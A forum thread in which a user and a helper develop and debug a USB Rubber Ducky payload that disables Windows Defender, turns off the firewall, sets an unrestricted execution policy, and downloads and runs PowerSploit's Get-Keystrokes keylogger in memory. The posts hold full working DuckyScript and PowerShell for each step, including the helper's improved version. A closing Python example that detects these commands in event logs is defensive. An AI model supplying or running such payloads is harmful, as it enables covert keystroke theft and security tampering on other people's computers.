hbkahuna Posted February 1, 2023
Hello. I recently purchased a Rubber Ducky, and one of the power scripts that I want to add is a keylogger. I believe I tried all of the developed examples on the Hak5 site and I can't get by Windows Defender. I tried adding additional power scripts to shut down Defender prior to the keylogger, but it catches the code as a dangerous virus and quarantines it. Can someone help me and show me the error of my ways? Regards
dark_pyrro Posted February 1, 2023
4 minutes ago, hbkahuna said:
"I tried all of the developed examples on the Hak5 site"
What examples did you try? Link(s)?
hbkahuna (Author) Posted February 2, 2023
Here is a snippet of code. With this one I get no error, but it doesn't create a logger file and I don't find the ps1 file on the system. There were some other examples that sent the results via email, but they stated you had to configure Google a certain way, and Google doesn't allow that anymore. So????

REM STAGE1
REM Title: PowerShell_Administrator
REM Target: Windows 10/11
REM Props: Hak5
REM Version: 1.0
REM GUI x brings up menu and the a selects PS admin
GUI x
DELAY 10
a
DELAY 10
TAB
DELAY 10
TAB
DELAY 10
ENTER
REM STAGE2 Windows Defender
REM attempts to disable defender
STRING Set-MpPreference -DisableRealtimeMonitoring $true;
REM STAGE 3 KeyLogger
REM What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar.
REM Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command.
REM The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command
REM is how many minutes you want to command to run.
STRING ATTACKMODE HID STORAGE
DELAY 100
ENTER
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 1000
ENTER
STRING Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10DELAY 100
ENTER
dark_pyrro Posted February 2, 2023
First of all, I would recommend an initial DELAY in the payload, like:
DELAY 3000
Using DELAY 10 is pretty useless; better just skip them or create some DELAYs that make a difference (i.e. with somewhat higher values). The lowest value is actually 20:
https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delay#delay

Are you perhaps using a Windows installation that has a system language other than English?
Are you running with a user in the Windows system that can't be elevated to admin permissions?
Did you verify that real-time monitoring actually is turned off? Create a payload that just contains "STAGE1" and "STAGE2" and check the Defender console to see if it really is disabled or not.

59 minutes ago, hbkahuna said:
"I dont find the ps1 file on the system"
As the comments in the payload say, "it downloads a simple script from github into memory", so it shouldn't touch any storage device; that's perhaps why you can't find it (in case you refer to your local PC when saying "system"). The log path is local, so any "loot" won't be saved to the Ducky storage.

Are you using a local account for the user on the PC or an online/Microsoft one? Directories (especially Desktop) aren't treated the same for these two kinds of users. Locations are different. Try some other more "generic" location, such as C:\tmp

The line
STRING Set-MpPreference -DisableRealtimeMonitoring $true;
has no ENTER following it, which makes a mess; it's probably concatenated with the STRING that follows,
STRING ATTACKMODE HID STORAGE
which results in
Set-MpPreference -DisableRealtimeMonitoring $true;ATTACKMODE HID STORAGE
which I'm certain PowerShell will have issues interpreting.

Not sure what this line is supposed to do. It just writes out that string:
STRING ATTACKMODE HID STORAGE
If in need of changing the ATTACKMODE, it should be only
ATTACKMODE HID STORAGE
However, I don't really see the need for that since the payload already is in ATTACKMODE HID and it's never using STORAGE, so kinda obsolete.

There's also probably a typo on the second to last line in the payload:
"STRING Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10DELAY 100"
The "DELAY 100" at the end of the line should most likely be a line of itself (not sure why it's there though, since it's the last line of the payload).

For the payload in general, every STRING line that has a line following it that says ENTER could be substituted with STRINGLN (and remove the ENTER line).

Last but not least, I'm not really a fan of payloads that try to disable local AV, since it's most often not a valid use case scenario in the real world. Either the computer is running with a user that can't make these kinds of changes (such as turning off AV protection), or those kinds of things get logged and trigger red alerts for the blue team.

I would probably write the payload something like this (haven't tried it though):
DELAY 3000
REM STAGE 1
GUI x
DELAY 50
a
REM The above could be/should be; STRING a
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
REM STAGE 2
STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
REM STAGE 3
DELAY 100
STRINGLN IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
DELAY 1000
STRINGLN Get-Keystrokes -LogPath C:\Users\User\Desktop\testing123.txt -Timeout 10
hbkahuna (Author) Posted February 3, 2023
Thank you for your comments. I found I first had to get past my Windows Defender and another anti-virus. You got me on the right solution path; I am surprised that the videos and all of the conversations don't mention that elephant in the room. I did the following and it did the trick. I will just show that snippet. Then back to the keylogger, which I think will work. I'm going to play with the delays and why a few of the key commands are there, but I'm just happy I got past the anti-virus. Be good to go, but thanks again!

DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
ENTER
STRING m
ENTER
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING netsh advfirewall set allprofiles state off
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
ENTER
DELAY 1000
STRING C:\Windows\config-59657.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
ENTER
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
ENTER
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
hbkahuna (Author) Posted February 6, 2023
I've trimmed the code quite a bit. I have a new issue; I have tried a number of things that don't work, and I'm wondering if anyone else has solved the "path is null" issue. Here is the updated code:

DELAY 3000
REM STAGE 1 Start your engines********************
GUI x
DELAY 500
STRINGLN a
DELAY 1000
ATTACKMODE HID
DELAY 500
REM STAGE 2 Stop Windows Defender Anti Virus********
REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy
REM Unrestricted}"
DELAY 1000
STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true";
DELAY 1000
STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\";
DELAY 500
STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
DELAY 1000
STRINGLN netsh advfirewall set allprofiles state off
DELAY 1000
STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
DELAY 1000
SHIFT y
DELAY 500
ENTER;
REM Stage 2 KeyLogger***********************************************************
REM DK is the RubberDuckey Label
REM Notes at end of script about KeyLogger
DELAY 1000
STRINGLN $u=gwmi Win32_Volume|?{$_.Label -eq'DK'}|select name;cd $u.name;

I GET the ERROR here: cd : Cannot process argument because the value of argument "path" is null. Change the value of argument "path" to a non-null value.

DELAY 1000
STRINGLN powershell "& 'Rundll33.exe'; 'svchosts.exe'; Keylogger
DELAY 1000
dark_pyrro Posted February 6, 2023
That way of populating $u should work. Is your Ducky really using 'DK' as its label (and not the default 'DUCKY' label)?
Alternatives to try (if the Ducky label of 'DK' is correct) might be:
$u = Get-WmiObject -Class Win32_Volume | where {$_.Label -eq "DK"} | select -expand name
or
$u = (gwmi win32_volume -f 'label=''DK''').Name
hbkahuna (Author) Posted February 6, 2023
Fantastic, thank you!
hbkahuna (Author) Posted February 8, 2023
OK, I have solved all the issues; the final part is running the keylogger exe's. There is one item busting me, and that's the antimalware service. It was giving me an error that the executables had a virus. So I used Task Manager to see what I may have missed killing, and there's an antimalware process that is running. I try killing it and I get the same error: not allowed. The line of code is
Stop-Service -Force -Name "WinDefend"
I'm wondering if I need to somehow add the two executables as expectable files?? Would appreciate some help. I'm on the 5 yard line, so to speak.
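The logging that dark_pyrro points to is what the blue team would actually lean on, and the commands quoted across this thread (Set-MpPreference, mpcmdrun, Stop-Service on WinDefend, netsh advfirewall, Set-ExecutionPolicy, IEX DownloadString) are exactly the kind that script-block logging records. The following is an added example, not code from the thread or from Hak5: it scans constructed Windows event records for those commands. Event ID 4104 (PowerShell script-block logging) and 5001 (Defender real-time protection disabled) are real IDs; the (event_id, message) record format and the regex rules are my assumptions.

```python
"""Added example: flag the defence-tampering commands quoted in this
thread in constructed Windows event records. Assumes records are
(event_id, message) pairs; 4104 is PowerShell script-block logging and
5001 is Defender 'real-time protection disabled'."""
import re

# Detection patterns (assumption: built from the commands in the thread).
TAMPER_PATTERNS = {
    "defender_realtime_off": r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true",
    "defender_exclusion_added": r"Add-MpPreference\s*-ExclusionPath",
    "defender_definitions_removed": r"mpcmdrun(?:\.exe)?\s+-RemoveDefinitions",
    "defender_service_stop": r"Stop-Service\b.*\bWinDefend\b",
    "firewall_all_profiles_off": r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off",
    "execution_policy_unrestricted": r"Set-ExecutionPolicy\b.*Unrestricted",
    "remote_script_in_memory": r"IEX\s*\(New-Object\s+Net\.WebClient\)\.DownloadString",
}
COMPILED = {name: re.compile(p, re.IGNORECASE) for name, p in TAMPER_PATTERNS.items()}

def scan_records(records):
    """Return (record_index, rule_name, matched_text) for every hit.
    A 5001 event is a hit on its own: Defender itself reports that
    real-time protection went off, whatever typed the command."""
    findings = []
    for idx, (event_id, message) in enumerate(records):
        if event_id == 5001:
            findings.append((idx, "defender_event_5001", message.strip()))
        elif event_id == 4104:
            for name, pattern in COMPILED.items():
                match = pattern.search(message)
                if match:
                    findings.append((idx, name, match.group(0)))
    return findings

# Constructed sample records, mimicking what the thread's payloads would leave.
SAMPLE_RECORDS = [
    (4104, "Get-ChildItem C:\\tmp"),
    (4104, "Set-MpPreference -DisableRealtimeMonitoring $true;"),
    (4104, "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')"),
    (5001, "Microsoft Defender Antivirus Real-time Protection is disabled."),
    (4104, "netsh advfirewall set allprofiles state off"),
    (4104, "Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false"),
    (4104, 'Stop-Service -Force -Name "WinDefend"'),
    (4688, "New Process: notepad.exe"),
]

def rules_hit(records=SAMPLE_RECORDS):
    """Rule names that fired, in record order (handy for alert summaries)."""
    return [rule for _, rule, _ in scan_records(records)]
```

Run `rules_hit()` to see the six rules that fire on the sample; the benign Get-ChildItem and the 4688 process event produce nothing.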
Archived
This topic is now archived and is closed to further replies.